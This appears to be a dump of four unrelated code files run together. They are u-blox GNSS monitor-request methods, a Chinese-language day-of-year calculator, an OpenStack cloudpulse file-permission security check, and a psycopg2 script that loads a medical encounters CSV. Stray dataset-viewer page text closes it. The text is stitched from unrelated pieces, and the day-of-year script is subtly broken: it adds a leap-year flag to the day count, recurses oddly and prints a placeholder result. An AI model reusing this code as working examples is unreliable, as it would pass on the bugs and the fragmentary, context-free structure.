def pin_settings(self, wait_time = 2500):
return self.request_standard_packet('MON', 'HW3', wait_time = wait_time)
def installed_patches(self, wait_time = 2500):
return self.request_standard_packet('MON', 'PATCH', wait_time = wait_time) #changed from HW3 to PATCH
def prod_test_pio(self, wait_time = 2500):
return self.request_standard_packet('MON', 'PIO', wait_time = wait_time)
def prod_test_monitor(self, wait_time = 2500):
return self.request_standard_packet('MON', 'PT2', wait_time = wait_time)
def rf_ant_status(self, wait_time = 2500):
return self.request_standard_packet('MON', 'RF', wait_time = wait_time)
def module_wake_state(self, wait_time = 2500): #No response on F9P
return self.request_standard_packet('MON', 'RXR', wait_time = wait_time)
def sensor_production_test(self, wait_time = 2500):#No response on F9P
return self.request_standard_packet('MON', 'SPT', wait_time = wait_time)
#def temp_val_state(self, wait_time = 2500):#Doesn't work because TEMP structure is not defined on sparkfun_predefines,
# return self.request_standard_packet('MON', 'TEMP', wait_time = wait_time)#and i honestly don't even see it on official UBLOX doc to fix it
def module_software_version(self, wait_time = 2500):
return self.request_standard_packet('MON', 'VER', wait_time = wait_time)
|
#coding=utf-8
class test_judgeday_base_yearmonthday:
year=""
month=""
day=""
actoryDay=""
def years(self):
print("请输入年份:")
ye=input()
if ye.isdigit():
if int(ye)%4==0:
return 0
else:
return 1
else:
print("年份不对,请输入正确的年份")
alls=test_judgeday_base_yearmonthday()
alls.years()
def months(self):
print("请输入月份")
t=input()
if t.isdigit():
mon = int(t)
while mon<=0 or mon>12:
print("请重新输入月份")
t=input()
mon=int(t)
if mon<=12 and mon>0:
break
mon_lists=[0,31,59,90,120,151,181,212,243,273,304,334,365]
return mon_lists[mon-1]
else:
m=test_judgeday_base_yearmonthday()
m.months()
def days(self):
really_day=test_judgeday_base_yearmonthday()
year=really_day.years()
month=really_day.months()
print("请输入天数")
day=input()
if day.isdigit():
intday=int(day)
while intday>31 or intday<=0:
print("请重新输入天数")
day=input()
intday=int(day)
if intday<=31 and intday>0:
break
print("这是一年的第 X 天")
return year+month+intday
else:
print("请重新输入天数")
ju=test_judgeday_base_yearmonthday()
ju.days()
if __name__=='__main__':
ju=test_judgeday_base_yearmonthday()
print(ju.days()) |
# Copyright 2010-2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import cloudpulse
from cloudpulse.operator.ansible.ansible_runner import ansible_runner
import json
import os
import subprocess
class SecurityFileCheck(object):
def perform_file_permission_check(self, input_params):
try:
print ("Executing the test ", input_params.get('testcase_name'))
final_result = []
final_status = []
final_msg = []
file_info_dir = input_params['global_data']['file_info_dir']
is_containerized = input_params['global_data']['is_containerized']
perform_on = input_params['perform_on']
if perform_on is None or not perform_on:
print ("Perform on should be mentioned either at test level" +
" or test case level")
msg = {'message': 'Perform on should be mentioned either at' +
' test level or test case level'}
return (404, json.dumps([msg]), [])
os_hostobj_list = input_params['os_host_list']
base_dir = os.path.dirname(cloudpulse.__file__)
baseline_file = input_params['baseline_file']
flist = [base_dir +
"/scenario/plugins/security_pulse/testcase/" +
"remote_file_check.py",
base_dir + "/scenario/plugins/security_pulse/testcase/" +
"remote_filecredentials.py",
file_info_dir + "dir_list",
file_info_dir + "os_baseline"]
def ConsolidateResults(flist, container_name=None):
result = ans_runner.execute_cmd(
"python " +
file_info_dir +
"remote_file_check.py ",
file_list=flist, container_name=container_name)
Result = ans_runner.get_parsed_ansible_output(result)
final_status.append(Result[0])
final_result.extend(ast.literal_eval(Result[1]))
final_msg.extend(Result[2])
for p in perform_on:
for obj in os_hostobj_list:
ans_runner = ansible_runner([obj])
if obj.getRole() == p:
os_dir = input_params[p + '_dir']
all_baseline = ast.literal_eval(
open(baseline_file).read())
baseline = all_baseline[p]
open(
file_info_dir +
'os_baseline',
'w').write(
str(baseline))
# if container, make dir list and copy to container
if is_containerized:
for container, os_dir in os_dir.items():
self.createDirList(
os_dir,
file_info_dir)
ConsolidateResults(
flist,
container_name=container)
subprocess.call([
'rm',
file_info_dir +
'dir_list'])
else:
os_dir_list = []
[os_dir_list.extend(d) for d in os_dir.values()]
# os_dir = os_dir.values()
self.createDirList(os_dir_list, file_info_dir)
# flist.append("/tmp/sec_hc/dir_list")
ConsolidateResults(flist)
subprocess.call([
'rm', '-rf',
file_info_dir +
'os_baseline',
file_info_dir +
'output'])
subprocess.call([
'rm',
file_info_dir +
'dir_list'])
if 404 in final_status:
return (404, final_result, final_msg)
else:
return (200, final_result, final_msg)
except Exception as e:
print ("exception in perform_file_permission_check is--", e)
subprocess.call([
'rm', '-rf',
file_info_dir +
'os_baseline',
file_info_dir +
'output'])
subprocess.call([
'rm',
file_info_dir +
'dir_list'])
print (
"Exception occured in executing" +
" perform_file_permission_check")
message = {
'message': 'Test case execution failed due to some exception'}
return (404, json.dumps([message]), [])
def createDirList(self, os_dir, file_info_dir):
if os_dir is not None:
f = open(file_info_dir + 'dir_list', 'w+')
for dir_name in os_dir:
f.write(dir_name + '\n')
f.close()
if __name__ == '__main__':
sec = SecurityFileCheck()
sec.perform_file_permission_check()
|
import psycopg2
conn = psycopg2.connect("dbname=siavash_database")
cur = conn.cursor()
cur.execute("""
CREATE TABLE new_schema.Encounters (
Encounter_EntryID integer,
MRN text,
Encounter_UniqueID integer,
Encounter_Date date,
Encounter_Status text,
Encounter_Type text,
Encounter_Department text,
Encounter_Specialty text,
Encounter_Provider text,
Encounter_HeightLength text,
Encounter_SystolicBloodPressure numeric,
Encounter_DiastolicBloodPressure numeric,
Encounter_Pulse numeric,
Encounter_Respirations numeric,
Encounter_Weight numeric)
""")
conn.commit()
cur.execute("""
COPY new_schema.Encounters
FROM
'/Users/siavashmortezavi/Documents/UCSF/file_conversion_pipeline/csv/Encounters.csv' DELIMITER ',' CSV HEADER;
""")
conn.commit()
conn.close() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.